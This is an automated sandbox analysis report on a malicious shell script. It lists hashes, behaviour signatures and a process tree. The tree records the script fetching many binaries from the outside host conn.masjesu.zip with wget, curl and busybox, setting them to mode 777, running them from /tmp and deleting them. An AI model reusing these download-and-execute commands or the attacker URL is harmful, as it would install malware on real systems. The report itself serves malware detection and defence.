Analysis
-
max time kernel
127s -
max time network
126s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
18/10/2024, 02:15
Static task
static1
Behavioral task
behavioral1
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh
-
Size
10KB
-
MD5
62c3af5d98480e4bfccd186de98627f5
-
SHA1
b814830f919dbd09114e657b1657554d719d9fb7
-
SHA256
9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4
-
SHA512
32736f2421c49416705f2f773c0a659184e55a3fb4c329ad0a008b34fc43b59ec7d1100fac4fb4674776e5e02e46cf7729e29bb6491e99ba220e53df38489bf2
-
SSDEEP
192:G5B87XQQiZG/rqpxwZWOzkUZ/rqpxt5B87XSWkUzN:yQccZV9
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh/tmp/9594f3c1ad6267033e4bcb8ea02755d90c1bcf14d410539cc5233314763084f4.sh1⤵PID:728
-
/bin/rm/bin/rm bins.sh2⤵PID:730
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:735
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:777
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:786
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:807
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:808
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:815
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:825
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:827
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:837
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:848
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:851
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:852
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:855
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:856
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:857
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:858
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:859
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:865
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:866
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:867
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:868
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:869
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:872
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:873
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:874
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:875
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:876
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:877
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:879
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:882
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:883
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:886
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:889
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:890
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:893
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:894
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:895
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:896
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:898
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:900
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:903
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:904
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:907
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:910
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:916
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:917
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:918
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:921
-
-
/bin/chmodchmod 777 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA./3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm 3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:925
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:928
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:931
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- System Network Configuration Discovery
PID:935
-
-
/bin/chmodchmod 777 oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- File and Directory Permissions Modification
PID:936
-
-
/tmp/oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq./oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵
- Executes dropped EXE
PID:937
-
-
/bin/rmrm oyUBEcyDU1EsQwThfqleajw2zL6xGkjhVq2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- System Network Configuration Discovery
PID:942
-
-
/bin/chmodchmod 777 ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z./ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm ulpTjIHw1jeDQZmF6RzO7W9tJr47Qgtx6z2⤵PID:945
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:946
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- System Network Configuration Discovery
PID:949
-
-
/bin/chmodchmod 777 TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe5./TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm TXtJAFY2FPmLSfRhLI3K6JBoUHWcVUJfe52⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- System Network Configuration Discovery
PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:956
-
-
/bin/chmodchmod 777 yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K./yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm yHUpKzFkPfU4RvV4gFyCPDeVb35XzQwr5K2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- System Network Configuration Discovery
PID:963
-
-
/bin/chmodchmod 777 l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg./l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm l7uMJpn2gU2A1XHREySCeYYuiE3uOt1Pyg2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- System Network Configuration Discovery
PID:970
-
-
/bin/chmodchmod 777 CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx9./CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm CnAKRAdi3tApXbz9PfBvFtOCPxhat9xhx92⤵PID:973
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:974
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- System Network Configuration Discovery
PID:977
-
-
/bin/chmodchmod 777 wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV./wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm wBkUcCmvd5WKJe6AX8S5iBPW4tljobiwNV2⤵PID:980
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:981
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- System Network Configuration Discovery
PID:984
-
-
/bin/chmodchmod 777 pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- File and Directory Permissions Modification
PID:985
-
-
/tmp/pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq./pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵
- Executes dropped EXE
PID:986
-
-
/bin/rmrm pOoyPo8XdIVPbyaVK8IhZfJ1ENibErgxSq2⤵PID:987
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:988
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:989
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- System Network Configuration Discovery
PID:991
-
-
/bin/chmodchmod 777 X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- File and Directory Permissions Modification
PID:992
-
-
/tmp/X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD4./X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵
- Executes dropped EXE
PID:993
-
-
/bin/rmrm X8v6F4c6B05Onk2nFfrufebrIBtbpB4HD42⤵PID:994
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:995
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:996
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- System Network Configuration Discovery
PID:998
-
-
/bin/chmodchmod 777 CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- File and Directory Permissions Modification
PID:999
-
-
/tmp/CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW./CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵
- Executes dropped EXE
PID:1000
-
-
/bin/rmrm CjyZ02mO3g2xCPtTyiQxci4JdwW20wGYyW2⤵PID:1001
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:1002
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1003
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- System Network Configuration Discovery
PID:1005
-
-
/bin/chmodchmod 777 vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- File and Directory Permissions Modification
PID:1006
-
-
/tmp/vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL./vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵
- Executes dropped EXE
PID:1007
-
-
/bin/rmrm vTFlFFgH6ntIhYYmQM79iWE6ShRXHK3VgL2⤵PID:1008
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1009
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1010
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1012
-
-
/bin/chmodchmod 777 ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- File and Directory Permissions Modification
PID:1016
-
-
/tmp/ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV0./ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵
- Executes dropped EXE
PID:1017
-
-
/bin/rmrm ZbCTaWzxJUBKCOjPvXAZ2rQ4s2Fe3H5aV02⤵PID:1018
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:1019
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1020
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- System Network Configuration Discovery
PID:1022
-
-
/bin/chmodchmod 777 suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- File and Directory Permissions Modification
PID:1023
-
-
/tmp/suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD./suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵
- Executes dropped EXE
PID:1024
-
-
/bin/rmrm suix9WXxQTeqWvMKbdFuZIdGKPkituhDmD2⤵PID:1025
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- System Network Configuration Discovery
PID:1026
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3djKwVxIHp8oLHNAgvPZAl916HRQeNTFzA2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1027
-
-
